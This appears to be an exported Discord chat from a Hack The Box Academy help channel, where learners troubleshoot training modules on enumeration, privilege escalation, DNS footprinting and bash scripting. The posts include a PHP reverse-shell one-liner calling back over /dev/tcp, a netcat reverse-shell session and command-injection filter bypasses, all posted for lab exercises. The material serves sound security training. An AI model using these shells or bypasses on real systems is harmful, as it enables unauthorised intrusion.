#modules

1 messages · Page 376 of 1

naive cedar
#

how about custom exploit?

#

sadglas ..

safe star
#

wym?

naive cedar
#

and I feel like the AD module on the academy is not enough. Is there any knowledge about AD that I should learn more about or is there any document that talks more about it?

worn sonnet
#

finsih ad modules here first

naive cedar
#

i'm done

safe star
#

the CAPE path goes a lot deeper

zenith oxide
#

Can I ask something for a second

#

Kinda random

#

But I need help

storm elk
#

What is it?

zenith oxide
#

I’ve deleted a chat on instagram and I have regretted it, is there ANY way I can get it back?

zenith oxide
#

What’s that?

storm elk
zenith oxide
#

Absolutely nothing?

#

It’s just gone?

tranquil axle
safe star
worn matrix
#

guys,except the module for ADCS,does anyone has any blog/public/somewhere to read on theoritical,about Certificate Services?

rustic sage
#

When you ping an IP how do you know if you are pinning a local host or a vm?

worn sonnet
#

its just to know if host is reachable and up or no

rustic sage
naive cedar
#

🥰

worn sonnet
waxen totem
#

TTL from nmap output is another way to determine OS/VM

mild pagoda
#

Hi folks, where can I send my troubleshooting request?

#

I couldn't see any other channel where I could send texts.

fathom pendant
mild pagoda
#

I need help with my account verification on HTB discord.

fathom pendant
mild pagoda
#

@storm elk are you the mod?

fathom pendant
#

They are a mod

storm elk
#

I am, yes

fathom pendant
#

Not necessarily the mod

storm elk
#

Feel free to dm me and I will help you sort it out

mild pagoda
#

thanks for responding, and thanks for help.
I need help with account verification on HTB.

fathom pendant
#

As there's no one mod to rule them all

storm elk
#

Everyone is awesome

waxen totem
storm elk
#

I am not, far from kek I am at the bottom of the foodchain

waxen totem
#

In sparkling we trust

tired atlas
#

does anyone else have problems with commands not working, the ones HTB gives you in the modules, it has happened to me twice, first with the nmap script command not working in the NFS portion of Footprinting (had to google an alternative) , and now in DNS portion where I'm getting "missing property name after reference operator" error after I put in a simple 'dig ns <domain.tld> @<nameserver>' command

storm elk
#

Can you show me a screenshot? @tired atlas

tired atlas
#

wait i'll verify

#

oh my i dont have a HTB account, only an academy one

storm elk
tired atlas
#

yeah I'm doing that

dapper moth
tired atlas
#

I actually cannot lol, I graduated uni like 2 months ago, and my uni blocked my email

fresh stone
#

I had a doubt for the LFI module. When I have RCE i can execute simple commands like ls or cat but when i input a reverse shell and listen on my own machine with nc e.g

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/my_ip/9001 0>&1'") ?>

nc -lvnp 9001

the server hangs but I dont get a connection, even when i am listening on the correct port. Why would the server hang but not connect to my machine?

storm elk
tired atlas
#

No they wont 😭 , I actually cannot afford silver subscription

novel matrix
storm elk
#

And are they not able to get back their Academy account if uni blocked their email?

novel matrix
storm elk
#

okay 🙂

autumn sorrel
#

just wanted to say thanks to the mods here for doing a great job

storm elk
#

thank you @autumn sorrel

earnest pasture
#

Good morning guys, query on the Skills Assessment of Windows Privilege escalation PT 1.

Question 2:

“Find the password for the ldapadmin account somewhere on the system”.

I got the answer after privilege escalation I don't know if this was the target or I should have found it first, I have tried all the techniques and I could not find it without privilege escalation, anyone could find it without privilege escalation?

strange horizon
#

Hackers, any help would be appreciated.

rustic anchor
#

dear all I am new to HTB, but when I go to HTB Academy it shows
We need to perform some compliance verification actions regarding your account!
Please contact us via the support bubble at the bottom right of the page or via the support email at customerops@hackthebox.com.
We are sorry for the inconvenience!

#

I need your support

mortal sierra
#

Hello

bitter grotto
#

Okay ✅

mortal sierra
#

Can anyone help me with HTB Linkvortex machine

bitter grotto
bitter grotto
rustic anchor
#

I emailed on mentioned email but no response

bitter grotto
mortal sierra
#

Can I dm you @bitter grotto ?

acoustic owl
mortal sierra
#

I don’t have access to this no access

acoustic owl
rustic anchor
narrow nacelle
#

Hi, I have a problem with the module "Internal Password Spraying - from Linux". I tried searching in Discord but couldn't find any actual explanation. I'm looking for a user that starts with the letter 's' whose password is Welcome 1. With kerbrute I got nothing but with crackmapexec I got another user that starts with the letter 't'. What am I doing wrong?

storm elk
#

@rustic sage I need help

narrow nacelle
#

please no scammers wtf

storm elk
narrow nacelle
#

yes

storm elk
#

please fwd to me

#

(you can dm me)

acoustic owl
narrow nacelle
#

Yeah, that's what I did

rustic anchor
#

hi @storm elk I need help to access academy.hackthebox.com, I am facing issue to access it shows message titled Account verification while my email is verified

storm elk
#

I am not sure how I can help you with that, I am just a Discord moderator. Best to ask support

compact patrolBOT
brazen saffron
#

^

brazen saffron
#

If someone know.

acoustic owl
#

Which old domain?

brazen saffron
acoustic owl
#

The module has been revised and therefore the questions are also slightly different. It may well be that facebook is now asked instead of paypal

naive cedar
#

according to you, what is difference between red team operators and AD pentesters?

brazen saffron
#

Red Teamer can perform actions on the physical side: copying badges, picking locks, etc.

naive cedar
#

red teamer or mafia -))

acoustic owl
# naive cedar according to you, what is difference between red team operators and AD pentester...
acoustic owl
twin lion
hollow mango
#

Awesome, hello!

vocal rover
#

There are few things that need to be updated. Few functionalists location in tools are change to other location. How I can request to HTB for updating these content in module?

brazen saffron
frosty parcel
#

Hello, do academy got pwn module ?

#

like the buffer overflow modules

#

I saw the two of them but not more

naive cedar
#

web servers like nginx, apache use "<User-Agent>", so avoid using "

wild sage
#

You have to put ls+/ or cat+/

fresh stone
naive cedar
fresh stone
#

nope

naive cedar
#

if not, then hackthebox's machines often block requests from outside

fresh stone
#

ah then thats prob it thx

tired atlas
#

Did anyone have trouble in the DNS portion of footprinting, when they did it? I've been at it for 6 hours

narrow nacelle
tired atlas
#

I've tried

#

trying to find subdomains, even installed dnsrecon, only to find the authoritative nameservers, the question is asking for the txt record of a failed zone transfer, however when I try dig txt <domain> and even <sub domain> it comes with the nameserver in the authority portion of the result, i'm getting no txt record, or anything.

acoustic owl
#

Check out the || subdomains ||

tired atlas
#

I havent found any!!

acoustic owl
jolly widget
tired atlas
jolly widget
#

coding is not needed

#

just tools

steady torrent
#

Hey, does HTB Gift Cards allows to subscribe to HTB academy as student ?

urban elk
#

'kay.

hallow kiln
#

What does this have to do with Academy modules?

dark hedge
#

@warm root please introduce yourself in #general after verifying your account.

shadow sedge
#

Network enumeration with nmap medium lab- i tried a lot of techniques but nothing worked idk what to do

tired atlas
#

Can you dm me

#

@shadow sedge

shadow sedge
#

Sure

gray yacht
atomic burrow
#

Pls subscribe

white crest
#

Hi everyone, just comleted the What's Next Knowledge Check box at the end of the Getting Started module (the one with GetSimple installed). I managed to get access and complete the section via Metasploit using this exploit, but I wanted to try giving it a go manually.
So I get a foothold manually and gain access to a webshell, but if I try entering any reverse shell one liners into it, my listen server doesn't seem to catch it. If I change my payload to instead run that reverse shell one liner instead of give me a web shell, my listen server still didn't catch it. Does anyone have any idea why?

wild sage
#

<@&861185840277487616>

atomic burrow
#

Sorry 😞

fossil jacinth
#

@Tub try a different one liner.

#

Or wait, you already have a foothold but you want to stabilize / get different shell ?

wild sage
#

does your listener and payload have the same port?

#

are you also using your kali/Parrot OS IP as the LHOST?

shadow sedge
#

it was a good one

white crest
white crest
white crest
wild sage
#

I read that part, same concept still applies. Trust me I've made that mistake a good amount of times

white crest
#

oh I see, LHOST was an exclusive thing to metasploit, not a general term

wild sage
#

yeah, so if you're using python3 -m http.server 8000 and have 0.0.0.0:8000

#

your LHOST is your machine

#

You have to add your IP to the payload

slate zinc
#

LHOST --> Local Host
RHOST--> Remote Host
that's how i remember it

wild sage
#

correct

#

another way to remember is LHOST is Listening Host and RHOST is Target Host

pine dune
#

Hi guys is there the site of ippsec where he puts retired boxes into the right modules?

#

I remember someone sending it before, think it was marcielee who sent it

pine dune
ancient niche
#

I need a little help how can i start Process Hacker?

slate zinc
pine dune
naive cedar
brazen saffron
#

Information Gathering - Web Edition
What is the API key the inlanefreight.htb developers will be changing too?

I don't understand how to find it? I have tried some tools show in the course and they don't find any comments or something to answer.

high reef
#

anyone do this module ?

storm elk
#

No spoilers please. Dm me

fathom pendant
brazen saffron
fathom pendant
ancient niche
#

someone do you know how can i run this?

fathom pendant
ancient niche
#

yes i'm in but i don't know how

brazen saffron
fathom pendant
#

How do you have the entry?

brazen saffron
#

Wdym?

ancient niche
storm elk
#

Did you add the subdomain in your hosts file?

brazen saffron
fathom pendant
fathom pendant
#

^

brazen saffron
#

It's in local.

storm elk
#

That’s part of the module?

fathom pendant
brazen saffron
#

vHosts needed for these questions:
inlanefreight.htb

fathom pendant
storm elk
#

You need to enumerate until you find nothing new

brazen saffron
#

Ah okay I understand marcie xd, we misunderstood each other.

brazen saffron
fathom pendant
brazen saffron
#

I thought we didn't need that, at least that's what I understood from your answer.

fathom pendant
#

That's a different domain entirely

brazen saffron
#

No but to find the subdomains, I thought we had to add them by listing the other one, with the ip.

ancient niche
#

i can't doing 😦

fathom pendant
fathom pendant
ancient niche
#

then

#

i have just this

brazen saffron
storm elk
#

Okay 🙂

fathom pendant
ancient niche
#

¬¬¬¬¬¬¬¬¬¬

fathom pendant
#

You were trying to do linux syntax in windows

ancient niche
fathom pendant
pine dune
fathom pendant
pine dune
fathom pendant
pine dune
#

I usually use that and it allows me to use linux commands

fathom pendant
#

They're in cmd

pine dune
fathom pendant
#

And no, it doesn't 'let you use linux commands'

#

Lots of things in powershell are aliased

#

ls is an alias

pine dune
#

ill search what it does

fathom pendant
pine dune
#

ahh I see

slate zinc
#

some commands are same in linux and windows but very few
but they might have diff syntax tho

pine dune
#

ahh okay

fathom pendant
ancient niche
#

nothing...

fathom pendant
pine dune
fathom pendant
#

You just launch a ps console with a bypassed execution policy, meaning you can run commands and scripts that may normally get blocked

ancient niche
#

then?

fathom pendant
#

I suggest checking where the tool is located from one of the module sections

#

Or maybe you can use the windows search feature to launch it

ancient niche
#

the problem is that the commands i cannot use

fathom pendant
#

It's not that you cannot use commands

#

It's that you're using invalid syntax for the os shell you're using

ancient niche
#

okey

#

i will try another thing

fathom pendant
#

If you haven't already, I suggest the intro to windows cli module

#

That'll get you familiar with windows syntax

ancient niche
#

I'm going to take a shower and I'll be back later

#

I already completed it

fathom pendant
ancient niche
#

maybe

fathom pendant
#

Not a maybe

ancient niche
#

😦

fathom pendant
#

You literally posted a screenshot of you using linux syntax in a cmd prompt

verbal turtle
#

hello i am in Stack-Based Buffer Overflows on Linux x86 skill assessment

i got buffer overflow but in normal user and i cant read /root/flag.txt

#
> nc -lnvp 3301
listening on [any] 3301 ...
connect to [10.10.14.16] from (UNKNOWN) [10.129.42.191] 52618
cat /root/flag.txt
cat: /root/flag.txt: Permission denied
^C```
#

any body ?

sick karma
#

Hello guys,
Have an issue with my module linux, it ask me :
What is the index number of the "sudoers" file in the "/etc" directory?
Here my answer:
1760669
Here how i found the result:
stat /etc/sudoers
File: /etc/sudoers
Size: 415 Blocks: 8 IO Block: 4096 regular file
Device: 254,1 Inode: 1760669 Links: 1
Access: (0440/-r--r-----) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2025-01-15 11:56:15.129999999 -0600
Modify: 2024-10-07 05:07:43.764188599 -0500
Change: 2024-10-07 05:07:47.677515898 -0500
Birth: 2024-10-07 05:07:43.657522095 -0500
And my answer is false, what's happenning ?? Bug?

brazen saffron
storm elk
#

Great job

fathom pendant
verbal turtle
#

bro ?

safe star
#

You might be on ur own with that ngl 😭

sick karma
fathom pendant
verbal turtle
safe star
verbal turtle
#

no

safe star
fathom pendant
safe star
verbal turtle
# safe star
> nc -lnvp 3301
listening on [any] 3301 ...
connect to [10.10.14.16] from (UNKNOWN) [10.129.42.191] 52874
id
uid=1001(htb-student) gid=1001(htb-student) groups=1001(htb-student)```
safe star
#

you’re not root, so how could you read a flag in the root directory?

sick karma
fathom pendant
#

Yeah they did

#

First question, just above

glass moat
#

Introduction to Digital Forensics : Skills Assessment
Determine the registry key used for persistence and enter it as your answer.

Do we have to use only Velociraptor? If possible, can I have a hint? Thank you.

autumn pilot
#

Preferably, yes. Velociraptor has some pretty neat pre-configured hunts that you can use

glass moat
#

yea i know but i am stuck on this question i can't find a good Artifacts that describe registry

earnest pasture
#

Hi guys, query on the Skills Assessment of Windows Privilege escalation PT 1.

Question 2:

“Find the password for the ldapadmin account somewhere on the system”.

I got the answer after privilege escalation I don't know if this was the target or I should have found it first, I have tried all the techniques and I could not find it without privilege escalation, anyone could find it without privilege escalation?

safe star
earnest pasture
old wren
#

Whoever put the "thick client / fatty" section in the "Attacking Common Applications": I hope that your pillow remains warm however many times you turn it around, and I hope that you always get something stuck in your teeth when you eat

#

not that it is disproportionately hard in comparison to the rest of the module (it is), but the infra doesn't follow the course content, so you do literally what it says in the course contents and it doesn't work, and you think to yourself "huh, I must be stupid, let me try again" and it doesn't work again.

Then you turn off the machine, restart the environment, wait a little bit for everything to settle. Try again, this time carefully moving through the course and... hey, it doesn't work again!

And then you do it another day, again, it doesn't work, you check the forums, you look at what people who have succeeded have done, hey, you've done all those same things and it didn't work.

And then, one day, you just do the exact same thing you've done for like 25 times now. And it works. It works. Why does it work now? Why?

#

rant over, I'm going to try finish that module now 🫡

safe star
#

Average thick client experience

pine dune
#

Hi guys

#

does anyone know why the frik my firefox is so slow? I have like 9GB assigned to my VM

#

3 processors too

old wren
old wren
pine dune
old wren
#

it depends how it was installed - if you're running a Debian derivative, probably apt-get update && apt-get upgrade will get the job done. If you're on some other platform or it was installed through flatpak or something, then Google for that specific platform

pine dune
high reef
#

anyone arounf for a nudge on Skill Assestment - Injection Attacks

high reef
ruby light
#

hello i hope i am in the right place i have been stuck on the flow control loops Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable. i keep getting the same answer but it is not right

ocean night
#

Include a link to the module / section so people know what you're talking about 🙂 Sure, a name is fine, but a direct link helps.

ruby light
# median thorn So sorry mate

it is how the world works, i went to school for cybersecurity and i liked the school portion but now i that i am trying to find a job and do things like htb i now know i am in the line of work

ocean night
#

So earlier in the section there is an example of looping n number of times. In the Exercise Script you are provided with the information you need, and a place to put the steps to answer the question. I'd say double check how you are looping, that you're looping the right number of times, and that you're setting the variable in between loops correctly.

#

It's a Tier1 module, so can't say much more detail here

#

and it's not a module I've done personally, so if anyone else wants to give some advice in DM, or here without giving it away, go for it

ruby light
icy cove
mystic nest
#

Hello! I'm extremely new to HTB, and was wondering about unlimited pwnbox access?

ocean night
#

(monthly and annual)

turbid hawk
#

can you setup a pwnbox on vm?

mystic nest
#

I mean, im still new to all of this in general as well. I do have VMware

And if I buy cubes (just the cubes themselves) does that grant access to the box or no?

mystic nest
#

Ahh. Well I appreciate the answers and help

turbid hawk
#

What module are you doing lol?

mystic nest
#

Just finished navigation on Linux Fundis

turbid hawk
mystic nest
#

That’s what im aiming for too. But also wanna try to help the online community best I can yf?

turbid hawk
mystic nest
#

I set up arch in three hours, I think I don’t know what im doing

turbid hawk
mystic nest
#

Still looks cool tho

turbid hawk
daring geyser
#

Hello guys , im new here and im starting to do the first module Linux Fundamentals, maybe i didnt understand why gives me a Error everytime i wanna connect to "My workstation" and do the question from lesson to continue in the right way, if someone can tell me something about it i will apreciate, thanks...

fathom pendant
#

You can do it from your own vm

daring geyser
#

i have vm ones ready but i dont know who install vpn there

#

and also i dont wanna disturb you or someone more, just i will check it

fathom pendant
#

Openvpn is already installed on parrot and kali

daring geyser
#

but im lost a little bit me english is not really good in off

mystic nest
fathom pendant
daring geyser
#

ah thanks, and sorry 🫂

mystic nest
#

you can do it broski

mystic nest
fathom pendant
#

They provide a target to ssh into

#

So the answers shouldnt be out of date

mystic nest
#

when i was using the pwnbox and had to use the uname command to enter the kernel release/version, it wouldnt take it

fathom pendant
mystic nest
#

googled it, found out the answer to the question was 2 versions behind what was on the pwnbox

#

yes im aware

fathom pendant
#

The target isn't the pwnbox

mystic nest
#

hmm

ocean night
#

Yup, exactly that

mystic nest
#

i cant reconnect atm because i already did my one per day

ocean night
#

You can connect with the VPN instead

mystic nest
#

but if i do it again and it switches from 6.5.0-13 to question answer then ill be flabberghasted

fathom pendant
#

Pwnbox is a web hosted attack box
Target is a machine somewhere meant to attack/connect to

mystic nest
#

wait

#

does that mean i could theoretically use my vm?

ocean night
#

Yes

fathom pendant
#

Not theoretical

ocean night
mystic nest
#

ahh so thats why theres a download vpn connection there then

fathom pendant
#

Yep

daring geyser
#

Error validation quest

compact patrolBOT
fathom pendant
shut ice
#

In stealing hashes module, how can SMB Auth from a windows box over a chisel proxy? Wouldn't 445 be in use already so don't understand how chisel has bound to it? The server comes started on the box for this lab, am I thinking about this wrong?

fathom pendant
#

Also idk what you mean by "stealing hashes module"

#

What's the actual module name?

shut ice
#

Yeah but if DC01 tries to reach my attacker box how can it?

#

Using CME

fathom pendant
shut ice
#

But the LNK file points at my attacker box, so it shouldn't even be talking to MS01 that's running chisel?

fathom pendant
#

It says hey, take requests bound for x machine:port and send it to y machine:port

#

It has to talk to ms01 to reach your machine

shut ice
#

Ah okay, so when DC01 tries to hit my IP the chisel server will also be responding to that IP for me?

fathom pendant
#

Otherwise it can't possibly reach you

shut ice
#

Then routing the traffic, think I get it now thanks haha

#

I thought since the chisel server is already running in the lab there was some config needed

daring geyser
#

@fathom pendant . This is in my own vm

fathom pendant
daring geyser
#

thanks so much : )

molten bough
#

need help with a module in the windows attacks & defense
i am on "Kerberoasting" and am having a hard time ssh ing back to the kali machine
keep getting an error "ssh: connect to host 10.129.204.151 port 22: Connection refused"
i am doing what it said to do in the overview, I got the passwords into a file. Now i need share the file back to the kali vm from the rdp machine.

steel snow
#

excuse me, at the footprinting module DNS section, what is this asking us to give?

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

#

i don't understand what they are asking for?

fathom pendant
#

Fully Qualified Domain Name

#

It's asking for the fqdn of the name server

blazing slate
#

heyy i have a problem, why i dont have openvpn installed on my parrot os in vm?

fathom pendant
blazing slate
#

it says that openvpn is already the newest version, though when i try to use it terminal says command not found

ocean night
#

How are you executing it?

#

(what command are you running)

fathom pendant
#

Also run it with sudo

blazing slate
#

🤦‍♂️

ocean night
#

lol

blazing slate
#

aight, works with sudo

#

thanks

fair yacht
#

ye it doesn't works without sudo

#

also you cannot even autocomplete the given file's name in the terminal

indigo mirage
#

Hello, I am a newbie student and I need help with something could anybody help me please?

shut ice
# fathom pendant Otherwise it can't possibly reach you

Are you sure on this? I'm just really confused

Here's an example
DC01 - 172.16.0.1
MS01 - 172.16.0.2 & 10.10.14.1
AttackBox - 10.10.14.2

How can DC01 opening a LNK file pointing at AttackBox not drop the connection? I understand chisel is forwarding traffic that reaches MS01, but the LNK file doesn't point at MS01?

fathom pendant
safe star
#

But why not just open inveigh on the windows machine?

shut ice
#

That's what I would normally do but It's on the module CME - capturing hashes and it uses chisel, so was wondering how it's possible

blazing slate
#

do i have to connect to new vpn for every new exercise/section?

blazing slate
#

so just regenerate targets

fathom pendant
#

Yep

south radish
#

Module: Password attacks, section: network services
When I try to brute force password on ssh with nxc, after first few failed attempts I get ERROR Internal Paramiko error for training4:1234567, Error reading SSH protocol banner. I set threads to 1 so I guess it isn't rate limit?

fathom pendant
#

Ssh sucks to bruteforce

rustic sage
#

and ultimately, would stop loading and I won't get a revshell. Is there something on the server that prevents it?

south radish
#

You can try to set listener on different port, maybe firewall blocks connections to specific ports

rustic sage
#

I tried, thats why I shifted to 80. Lemme try 443 as well

#

not getting a hit

south radish
#

Try to inspect it in wireshark

#

To see if you get any request

#

response*

rustic sage
#

I'm not getting any responses..

#

I mean, I have got the required flags, but I just wanted to kill the minor inconveniences haha

south radish
#

Can you ping your host from target to ensure your host is reachable

#

Through command injection

safe star
rustic sage
#

tried &cmd=ping 10.10.14.4 but that didn't get any response other than
selected_language|s:31:"";preference|s:7:"Spanish";

safe star
#

Can’t remember if that one is public tho

rustic sage
cloud urchin
#

also if you're running a listener below port 1024 you're going to need to use sudo to bind the port

fathom pendant
#

You're not gonna get a callback

#

It's a public docker container, it's not meant to be able to call back to other machines

wild sage
#

You gotta use burp

fathom pendant
#

You don't have to use burp

clever topaz
#

Is it ok to do Attacking Enterprise Network partially blind and understand what and why I missed out

#

I feel so guilty seeing one walkthrough yesterday haha

fathom pendant
#

It's a module above t0

fathom pendant
clever topaz
fathom pendant
#

Treat everything as a blank box

#

Assume nothing

#

This is also advice for the exam, assume any system you run into on the network is a blank system, unless you pillage info that says otherwise

clever topaz
#

Got it, will learn from my mistake thanks

fathom pendant
#

Enumeration is an iterative process; each system you start from 0

ruby light
#

is this the only support for htb

fathom pendant
#

Support isn't on the discord

#

If you need to contact support

compact patrolBOT
fathom pendant
#

Assuming it's for academy and not labs

ruby light
#

i am stuck on a question and about to give up on working in this field

fathom pendant
#

Well if you say what you're stuck on and what module and section you can get help

ruby light
#

Introduction to Bash Scripting Flow Control - Loops i was in here earlier and was told since it is tier 1 it is easly

#

i am new to his field

cloud urchin
#

I believe the bypassing filters section goes over how to test for which chars are triggering the filter

fathom pendant
#

Your first filter is missing something

fathom pendant
#

I didn't do it on my main laptop/vm so I don't have the code

uneven niche
fathom pendant
#

You don't need to see the value

ruby light
fathom pendant
#

Read the question carefully

#

The number of characters in that last iteration is what should be assigned to the salt variable

#

And then, when the code is executed, you'll get the answer

uneven niche
# fathom pendant Your first filter is missing something

Would you mind expanding on this a bit?

From my understanding, the first payload should output something like:
ping -c 127.0.0.1;
ls /home

which is essentially the same output as the second payload if I'm not mistaken. I was at a wall with the first payload until I simply tried a different bypass method.

fathom pendant
#

That's more what I meant

fathom pendant
#

You don't have a newline character

#

Deleted your og message since it's a spoiler, spoiler text does fuck all

uneven niche
#

From the lesson I gathered that ${IFS} was the same thing

uneven niche
#

as new line

fathom pendant
#

It's more of a whitespace

#

Yeah, there's ways to determine that

#

Fun fact ${#var}, echo -n $var | wc -c

uneven niche
#

Interesting. Well in that section it says "So, let's try to use environment variables to add a semi-colon and a space to our payload (127.0.0.1${LS_COLORS:10:1}${IFS}) as our payload, and see if we can bypass the filter: As we can see, we successfully bypassed the character filter this time as well." so I got a bit confused

fathom pendant
#

semicolon and a space

#

:)

uneven niche
#

ahhhhhhhhhhhh

#

ok thanks for your time! ❤️

#

I get it now

#

My next question is how come a space bypasses the filter, but gives me no output on the HTTP response, but the new line character does give me output on the HTTP response

prisma canyon
#

I'm doing the proxying tools module and I can't get the proxychains to work correctly and send the traffic through burpsuite. I've changed the last line of the configuration file like in the instruction to http 127.0.0.1 8080 but when I run the command proxychains4 curl http://94.237.50.135:32600 the burpsuite doesn't intercept it. It does however when i use this command which was proposed to me by chatgpt curl --proxy 127.0.0.1:8080 http://94.237.50.135:32600

#

I just don't know why the proxychains isn't working as it's supposed to

#

As if it didn't care about the configuration file

fathom pendant
#

Proxy stuff is finicky like that

prisma canyon
fathom pendant
#

Did you try running proxychains with sudo

prisma canyon
#

Awesome

fathom pendant
#

Hey. Fuck off

#

You're not official support in any capacity

fathom pendant
prisma canyon
#

I get the response but it doesn't go through burp

prisma canyon
fathom pendant
#

Yeah

#

🤨

#

You only need to count the var length at the end

prisma canyon
#

That some things are done different in new versions of programs

#

And it's just confusing

uneven galleon
#

@deep bluff Kaisa hai bhaiiii

#

Hello there everyone !

fathom pendant
uneven galleon
fathom pendant
#

It could be wc -m not -c

uneven galleon
#

Well Can you guys help me out ?

fathom pendant
#

Well, you didn't ask a a question

uneven galleon
#

;-; okay so i am planning to purchase a laptop for myself . Specially only for office works not for hacking. so should i go for mac m1 ?

fathom pendant
#

Read and follow #welcome to be able to access other channels

ruby light
fathom pendant
#

You're updating a variable named ar not var kek

ruby light
#

the bold it #

fathom pendant
#

That's discord formatting it with markdown

#

If you link your account via #welcome instructions you can do code blocks, but I'm yeeting them bc spoilers

#

It looks like you're not encoding the variable in b64

#

Understanding the instructions is important

#

Wrong

#

You only count the characters after the loop

#

Otherwise your variable then becomes;
Var --> base64 of that var --> length of that base64, which once you're at a certain point is just iterative

safe star
#

now var equals the result of wc -m

fathom pendant
#

^

#

Which then becomes a repeating digit because length

safe star
#

take the -n out

fathom pendant
#

Iirx

#

It's been a minute

safe star
#

yeah i just tried it

fathom pendant
#

You do need it for the var iterative though

ruby light
#

i got 34070 and it was wrong

fathom pendant
#

Because that's not gonna be the answer

#

The salt value is used to decrypt the message to give you the answer when you run the script

#

The length isn't the answer it's only part of the solution

#

That's why you insert the for loop where you do

uneven niche
ruby light
uneven niche
#

maybe you need to take a break and come back at it fresh again later 🙂

#

just part of being human sometimes

safe star
ruby light
#

it is the only question for this module

safe star
#

theres 2 parts to the question

fathom pendant
#

Part 1 is getting the loop, part 2 is running the script and getting the answer

#

The answer will be HTB...0x

safe star
#

thats not the number

#

you were closer before

#

just assign the salt variable to the amount of $var characters so you will get the flag automatically

fathom pendant
ruby light
#

i am trying to find the code i had when i was closer

safe star
fathom pendant
#

I somewhat like this question as it mirrors what you'd see in a coding interview type question

fathom pendant
safe star
#

just used seq and wc --char <<<$var

#

that would be better tbh

fathom pendant
#

Many ways to cook an egg

rough comet
#

hi folks

#

Got a question about Attacking Common Services -Assesment Medium

#

I actually resolved it.

fathom pendant
rough comet
#

But for the "thing" we need... I ended manually editing that thing, removing extra spaces, etc.

#

My 50 inches monitor helped 😂 but I know there must be a more elegant and proper way to do.

fathom pendant
#

Not sure about manual editing

ruby light
#

do i have the wc in the correct place

fathom pendant
#

I suggest stopping posting the code

rough comet
fathom pendant
safe star
rough comet
#

did you resolve it recently? Maybe the exercise changed.

safe star
#

the result is 1 chracter smaller than the answer 😂

rough comet
fathom pendant
#

That is only part of the problem

#

The salt is used to decrypt something

#

Run the whole script

ruby light
#

i thought i was

fathom pendant
#

You're missing the bottom part of the script

#

The answer isn't a number

safe star
ocean night
#

The wording on that question could be a bit clearer to be honest

ruby light
#

i think i decrypted it and it starts with U2Fs but it did not work

safe star
#

marcielee already said it should start with HTB

ocean night
#

Was gonna say take it to DMs, but I'm so tired of watching for spoilers for content over Tier 0

#

It's literally in the channel subject

#

so I'm done with that

fathom pendant
#

I've been nuking the script excerpts

ocean night
#

Appreciate it

#

It just never ends

safe star
fathom pendant
#

I'm eating some corn that's popped

ocean night
#

Popped corn? Hmmm interesting

#

That could catch on

ruby light
#

you have to add someone to dm right i have not usred dicord very many times

ocean night
#

Depends on how they have their DMs setup

#

Mine used to be open, but I changed them recently

#

You should ask to DM before doing so as well #rules

ruby light
#

some did ask i am trying to figure it out

#

i think i sent it

rough comet
fathom pendant
#

¯_(ツ)_/¯

rough comet
#

this is what I am talking about

#

I tried with awk

#

But it is a real pain

ocean night
#

I love looking for mats at the weekend

fathom pendant
#

Yeah that's weird, considering it should be new-lines

#

I wonder how you copied it

#

The protocol used probably did something funky

rough comet
#

I did not even copied it, lol... I move the whole thing via python upload

ruby light
#

thanks for the help i am calling it quits if i cant figure it out now i will not be alble with someone i know your not giving me the answer i get i need to learn but i am a classroom learner

fathom pendant
#

kek that'd probably be why

rough comet
ocean night
#

I think you're close michael

rough comet
#

because it is part of a || mail ||

fathom pendant
ocean night
#

Want one last go in DM, show me what you got?

fathom pendant
rough comet
rough comet
fathom pendant
#

I just used the method to connect directly to the mail portion of the server

rough comet
#

I did NOT obtain it that way, lol

fathom pendant
fathom pendant
rough comet
#

that's a different way

#

You mean, using same creds for the POP3 server?

fathom pendant
#

Or imap(s)

rough comet
#

ok, 1 sec

#

That is probably why you were getting a cleaner format

fathom pendant
fathom pendant
#

Weird I don't recall that formatting issue

ocean night
#

Connecting through a windows commandline, or powershell?

#

Although I think pwsh on Linux uses just LF instead of CRLF as cmd does

#

Even so, an LF should stil break line on cmd right?

fathom pendant
#

Also spoiler tags do sweet fuck all

rough comet
#

freaking spaces, lol

#

now I can go to bed and I won't be thinking about it all night

fathom pendant
#

I didn't use a mail client

rough comet
#

but I did 😂

rough comet
#

I was getting those weird formatting errors using the other protocol as well

#

Thanks anyway. Netflix and cookies time. Then bed. Last season of Dark. But it seems I will have to repeat the whole thing again 😂 what a complex show

potent yoke
#

did anybody have a clue with .vhd file in password attack lab - hard?

#

i already using john to crack the password but didn't give me anything

fathom pendant
#

Did you do the proper 2john tool?

potent yoke
#

yap i already

#

but i think i already figure it out

#

i forget to use the grep "bitlocker $0"

real burrow
#

Hi, I am on module Command Injection - Advanced Obfuscation, doing the task, who can help me out with the payload?

bronze zephyr
#

Where can I learn video editing guys?

ocean night
#

Google

quasi wave
#

Hi guys. I looked it up. Synack has network pentesting bounties. Other bug hunters I have talked to say I will be behind more experienced pentesters if I do it but also that doing Synack is a good way to get real world experience and once I get my CPTS its a good place to practice network hacking skills legally. Synack Red Team professionals told me this.

#

Even if I’m behind other pentesters, real world experience helps. I know Synack does network pentesting because I talked to Synack admins and people that have worked there and looked at their website.

fathom pendant
quasi wave
fathom pendant
#

When did i say that?

quasi wave
#

Its on their website. They call it host pentesting

#

What do you mean biased?

fathom pendant
#

I just meant the people giving you the info are biased

#

Look up the definition of the word

quasi wave
#

Its not just bug hunters I looked on Synack’s website and its there

fathom pendant
#

Biased != illegal

quasi wave
#

They call it “host penetration testing”

fathom pendant
#

It just means they're more likely to lean one way when talking to you

#

Of course Synack would wanna coax you into joining lol

quasi wave
#

They also do cloud, mobile, web, and even social engineering pentesting according to their website

quasi wave
waxen totem
#

They lure you in with their "real world experience" and drop you onto a web bounty cos thats all they actually have

fathom pendant
#

Didn't say they're lying

quasi wave
#

And if they aren’t lying then are you saying using synack to practice hacking is a bad idea?

#

If so, why?

fathom pendant
#

You have to actually get the work

quasi wave
#

Oh ok ya

fathom pendant
#

They don't just hand you something to do

quasi wave
#

Ok let’s move convo there

wide narwhal
#

Hey there, currently doing CDSA course, I don't understand why sometimes like for example the module "Windows Attacks & Defense" - "Credentials in Object Properties" , 3rd question I was asked to find the TargetSID for the user Bonni from Windows Events, but I don't have any events having the user "Bonni", it happened also when I was first section "Kerberoasting", 3rd question " what is the ServiceSID of the webservice user" and I didn't have any "webservice" user anywhere from Windows Event - Security

#

I searched through Windows Events gui and also using Powershell, I was able to find all other users except the ones in the question

fathom pendant
#
